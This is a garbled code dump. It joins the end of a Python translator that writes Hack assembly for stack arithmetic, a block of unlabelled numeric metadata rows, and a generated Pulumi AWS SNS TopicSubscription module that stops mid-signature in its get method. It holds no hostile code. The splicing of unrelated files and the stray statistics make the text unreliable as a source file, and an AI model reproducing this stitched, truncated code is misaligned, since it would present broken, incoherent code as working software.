self.file.write('(IF_TRUE_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=-1\n')
self.file.write('(END_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'and':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('M=D&M\n')
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'or':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('M=D|M\n')
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'neg':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('M=-M\n')
elif command == 'not':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('M=!M\n')
else:
raise ValueError(
"Unrecognized command for C_ARITHMETIC command type")
def createOutput(self):
# initially set the SP address to 256 (the address for the stack)
self.file.write('@256\n')
self.file.write('D=A\n')
self.file.write('@SP\n')
self.file.write('M=D\n')
# set the local address to 300
self.file.write('@300\n')
self.file.write('D=A\n')
self.file.write('@LCL\n')
self.file.write('M=D\n')
# set the argument address to 400
self.file.write('@400\n')
self.file.write('D=A\n')
self.file.write('@ARG\n')
self.file.write('M=D\n')
# set the this address to 3000
self.file.write('@3000\n')
self.file.write('D=A\n')
self.file.write('@THIS\n')
self.file.write('M=D\n')
# set the that address to 3010
self.file.write('@3010\n')
self.file.write('D=A\n')
self.file.write('@THAT\n')
self.file.write('M=D\n')
self.parser.i = -1
while self.parser.hasMoreCommands():
self.parser.advance()
c_type = self.parser.commandType()
if c_type in ['C_PUSH', 'C_POP']:
self.writePushPop()
elif c_type == 'C_ARITHMETIC':
self.writeArithmetic()
# close file
self.file.close()
if __name__ == "__main__":
for path in ["StackArithmetic/SimpleAdd/SimpleAdd.vm", "StackArithmetic/StackTest/StackTest.vm",
"MemoryAccess/BasicTest/BasicTest.vm", "MemoryAccess/PointerTest/PointerTest.vm",
"MemoryAccess/StaticTest/StaticTest.vm"]:
codewriter = CodeWriter(path)
codewriter.createOutput()
| 39.415584
| 100
| 0.469934
| 1,651
| 12,140
| 3.423985
| 0.09146
| 0.258978
| 0.416239
| 0.289758
| 0.720502
| 0.709181
| 0.70865
| 0.70865
| 0.68813
| 0.672209
| 0
| 0.017004
| 0.360544
| 12,140
| 307
| 101
| 39.543974
| 0.711194
| 0.109473
| 0
| 0.735178
| 0
| 0
| 0.150687
| 0.017373
| 0
| 0
| 0
| 0.003257
| 0.007905
| 1
| 0.01581
| false
| 0.01581
| 0.003953
| 0
| 0.023715
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
632d627a4bcd3708d72cd96783ba50edc3b46e8f
| 44,082
|
py
|
Python
|
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TopicSubscriptionArgs', 'TopicSubscription']
@pulumi.input_type
class TopicSubscriptionArgs:
def __init__(__self__, *,
endpoint: pulumi.Input[str],
protocol: pulumi.Input[str],
topic: pulumi.Input[str],
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a TopicSubscription resource.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "topic", topic)
if confirmation_timeout_in_minutes is not None:
pulumi.set(__self__, "confirmation_timeout_in_minutes", confirmation_timeout_in_minutes)
if delivery_policy is not None:
pulumi.set(__self__, "delivery_policy", delivery_policy)
if endpoint_auto_confirms is not None:
pulumi.set(__self__, "endpoint_auto_confirms", endpoint_auto_confirms)
if filter_policy is not None:
pulumi.set(__self__, "filter_policy", filter_policy)
if raw_message_delivery is not None:
pulumi.set(__self__, "raw_message_delivery", raw_message_delivery)
if redrive_policy is not None:
pulumi.set(__self__, "redrive_policy", redrive_policy)
if subscription_role_arn is not None:
pulumi.set(__self__, "subscription_role_arn", subscription_role_arn)
@property
@pulumi.getter
def endpoint(self) -> pulumi.Input[str]:
"""
Endpoint to send data to. The contents vary with the protocol. See details below.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: pulumi.Input[str]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def topic(self) -> pulumi.Input[str]:
"""
ARN of the SNS topic to subscribe to.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: pulumi.Input[str]):
pulumi.set(self, "topic", value)
@property
@pulumi.getter(name="confirmationTimeoutInMinutes")
def confirmation_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
"""
return pulumi.get(self, "confirmation_timeout_in_minutes")
@confirmation_timeout_in_minutes.setter
def confirmation_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "confirmation_timeout_in_minutes", value)
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
"""
return pulumi.get(self, "delivery_policy")
@delivery_policy.setter
def delivery_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delivery_policy", value)
@property
@pulumi.getter(name="endpointAutoConfirms")
def endpoint_auto_confirms(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
"""
return pulumi.get(self, "endpoint_auto_confirms")
@endpoint_auto_confirms.setter
def endpoint_auto_confirms(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "endpoint_auto_confirms", value)
@property
@pulumi.getter(name="filterPolicy")
def filter_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
"""
return pulumi.get(self, "filter_policy")
@filter_policy.setter
def filter_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_policy", value)
@property
@pulumi.getter(name="rawMessageDelivery")
def raw_message_delivery(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
"""
return pulumi.get(self, "raw_message_delivery")
@raw_message_delivery.setter
def raw_message_delivery(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "raw_message_delivery", value)
@property
@pulumi.getter(name="redrivePolicy")
def redrive_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
"""
return pulumi.get(self, "redrive_policy")
@redrive_policy.setter
def redrive_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "redrive_policy", value)
@property
@pulumi.getter(name="subscriptionRoleArn")
def subscription_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
return pulumi.get(self, "subscription_role_arn")
@subscription_role_arn.setter
def subscription_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_role_arn", value)
@pulumi.input_type
class _TopicSubscriptionState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
confirmation_was_authenticated: Optional[pulumi.Input[bool]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
pending_confirmation: Optional[pulumi.Input[bool]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering TopicSubscription resources.
:param pulumi.Input[str] arn: ARN of the subscription.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[bool] confirmation_was_authenticated: Whether the subscription confirmation request was authenticated.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[str] owner_id: AWS account ID of the subscription's owner.
:param pulumi.Input[bool] pending_confirmation: Whether the subscription has not been confirmed.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if confirmation_timeout_in_minutes is not None:
pulumi.set(__self__, "confirmation_timeout_in_minutes", confirmation_timeout_in_minutes)
if confirmation_was_authenticated is not None:
pulumi.set(__self__, "confirmation_was_authenticated", confirmation_was_authenticated)
if delivery_policy is not None:
pulumi.set(__self__, "delivery_policy", delivery_policy)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if endpoint_auto_confirms is not None:
pulumi.set(__self__, "endpoint_auto_confirms", endpoint_auto_confirms)
if filter_policy is not None:
pulumi.set(__self__, "filter_policy", filter_policy)
if owner_id is not None:
pulumi.set(__self__, "owner_id", owner_id)
if pending_confirmation is not None:
pulumi.set(__self__, "pending_confirmation", pending_confirmation)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if raw_message_delivery is not None:
pulumi.set(__self__, "raw_message_delivery", raw_message_delivery)
if redrive_policy is not None:
pulumi.set(__self__, "redrive_policy", redrive_policy)
if subscription_role_arn is not None:
pulumi.set(__self__, "subscription_role_arn", subscription_role_arn)
if topic is not None:
pulumi.set(__self__, "topic", topic)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the subscription.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="confirmationTimeoutInMinutes")
def confirmation_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
"""
return pulumi.get(self, "confirmation_timeout_in_minutes")
@confirmation_timeout_in_minutes.setter
def confirmation_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "confirmation_timeout_in_minutes", value)
@property
@pulumi.getter(name="confirmationWasAuthenticated")
def confirmation_was_authenticated(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the subscription confirmation request was authenticated.
"""
return pulumi.get(self, "confirmation_was_authenticated")
@confirmation_was_authenticated.setter
def confirmation_was_authenticated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "confirmation_was_authenticated", value)
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
"""
return pulumi.get(self, "delivery_policy")
@delivery_policy.setter
def delivery_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delivery_policy", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
Endpoint to send data to. The contents vary with the protocol. See details below.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="endpointAutoConfirms")
def endpoint_auto_confirms(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
"""
return pulumi.get(self, "endpoint_auto_confirms")
@endpoint_auto_confirms.setter
def endpoint_auto_confirms(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "endpoint_auto_confirms", value)
@property
@pulumi.getter(name="filterPolicy")
def filter_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
"""
return pulumi.get(self, "filter_policy")
@filter_policy.setter
def filter_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_policy", value)
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> Optional[pulumi.Input[str]]:
"""
AWS account ID of the subscription's owner.
"""
return pulumi.get(self, "owner_id")
@owner_id.setter
def owner_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_id", value)
@property
@pulumi.getter(name="pendingConfirmation")
def pending_confirmation(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the subscription has not been confirmed.
"""
return pulumi.get(self, "pending_confirmation")
@pending_confirmation.setter
def pending_confirmation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "pending_confirmation", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="rawMessageDelivery")
def raw_message_delivery(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
"""
return pulumi.get(self, "raw_message_delivery")
@raw_message_delivery.setter
def raw_message_delivery(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "raw_message_delivery", value)
@property
@pulumi.getter(name="redrivePolicy")
def redrive_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
"""
return pulumi.get(self, "redrive_policy")
@redrive_policy.setter
def redrive_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "redrive_policy", value)
@property
@pulumi.getter(name="subscriptionRoleArn")
def subscription_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
return pulumi.get(self, "subscription_role_arn")
@subscription_role_arn.setter
def subscription_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_role_arn", value)
@property
@pulumi.getter
def topic(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the SNS topic to subscribe to.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "topic", value)
class TopicSubscription(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a resource for subscribing to SNS topics. Requires that an SNS topic exist for the subscription to attach to. This resource allows you to automatically place messages sent to SNS topics in SQS queues, send them as HTTP(S) POST requests to a given endpoint, send SMS messages, or notify devices / applications. The most likely use case for provider users will probably be SQS queues.
> **NOTE:** If the SNS topic and SQS queue are in different AWS regions, the `sns.TopicSubscription` must use an AWS provider that is in the same region as the SNS topic. If the `sns.TopicSubscription` uses a provider with a different region than the SNS topic, this provider will fail to create the subscription.
> **NOTE:** Setup of cross-account subscriptions from SNS topics to SQS queues requires the provider to have access to BOTH accounts.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts but the same region, the `sns.TopicSubscription` must use the AWS provider for the account with the SQS queue. If `sns.TopicSubscription` uses a Provider with a different account than the SQS queue, this provider creates the subscription but does not keep state and tries to re-create the subscription at every `apply`.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts and different AWS regions, the subscription needs to be initiated from the account with the SQS queue but in the region of the SNS topic.
> **NOTE:** You cannot unsubscribe to a subscription that is pending confirmation. If you use `email`, `email-json`, or `http`/`https` (without auto-confirmation enabled), until the subscription is confirmed (e.g., outside of this provider), AWS does not allow this provider to delete / unsubscribe the subscription. If you `destroy` an unconfirmed subscription, this provider will remove the subscription from its state but the subscription will still exist in AWS. However, if you delete an SNS topic, SNS [deletes all the subscriptions](https://docs.aws.amazon.com/sns/latest/dg/sns-delete-subscription-topic.html) associated with the topic. Also, you can import a subscription after confirmation and then have the capability to delete it.
## Import
SNS Topic Subscriptions can be imported using the `subscription arn`, e.g.
```sh
$ pulumi import aws:sns/topicSubscription:TopicSubscription user_updates_sqs_target arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TopicSubscriptionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource for subscribing to SNS topics. Requires that an SNS topic exist for the subscription to attach to. This resource allows you to automatically place messages sent to SNS topics in SQS queues, send them as HTTP(S) POST requests to a given endpoint, send SMS messages, or notify devices / applications. The most likely use case for provider users will probably be SQS queues.
> **NOTE:** If the SNS topic and SQS queue are in different AWS regions, the `sns.TopicSubscription` must use an AWS provider that is in the same region as the SNS topic. If the `sns.TopicSubscription` uses a provider with a different region than the SNS topic, this provider will fail to create the subscription.
> **NOTE:** Setup of cross-account subscriptions from SNS topics to SQS queues requires the provider to have access to BOTH accounts.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts but the same region, the `sns.TopicSubscription` must use the AWS provider for the account with the SQS queue. If `sns.TopicSubscription` uses a Provider with a different account than the SQS queue, this provider creates the subscription but does not keep state and tries to re-create the subscription at every `apply`.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts and different AWS regions, the subscription needs to be initiated from the account with the SQS queue but in the region of the SNS topic.
> **NOTE:** You cannot unsubscribe to a subscription that is pending confirmation. If you use `email`, `email-json`, or `http`/`https` (without auto-confirmation enabled), until the subscription is confirmed (e.g., outside of this provider), AWS does not allow this provider to delete / unsubscribe the subscription. If you `destroy` an unconfirmed subscription, this provider will remove the subscription from its state but the subscription will still exist in AWS. However, if you delete an SNS topic, SNS [deletes all the subscriptions](https://docs.aws.amazon.com/sns/latest/dg/sns-delete-subscription-topic.html) associated with the topic. Also, you can import a subscription after confirmation and then have the capability to delete it.
## Import
SNS Topic Subscriptions can be imported using the `subscription arn`, e.g.
```sh
$ pulumi import aws:sns/topicSubscription:TopicSubscription user_updates_sqs_target arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f
```
:param str resource_name: The name of the resource.
:param TopicSubscriptionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TopicSubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TopicSubscriptionArgs.__new__(TopicSubscriptionArgs)
__props__.__dict__["confirmation_timeout_in_minutes"] = confirmation_timeout_in_minutes
__props__.__dict__["delivery_policy"] = delivery_policy
if endpoint is None and not opts.urn:
raise TypeError("Missing required property 'endpoint'")
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["endpoint_auto_confirms"] = endpoint_auto_confirms
__props__.__dict__["filter_policy"] = filter_policy
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["raw_message_delivery"] = raw_message_delivery
__props__.__dict__["redrive_policy"] = redrive_policy
__props__.__dict__["subscription_role_arn"] = subscription_role_arn
if topic is None and not opts.urn:
raise TypeError("Missing required property 'topic'")
__props__.__dict__["topic"] = topic
__props__.__dict__["arn"] = None
__props__.__dict__["confirmation_was_authenticated"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["pending_confirmation"] = None
super(TopicSubscription, __self__).__init__(
'aws:sns/topicSubscription:TopicSubscription',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
confirmation_was_authenticated: Optional[pulumi.Input[bool]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
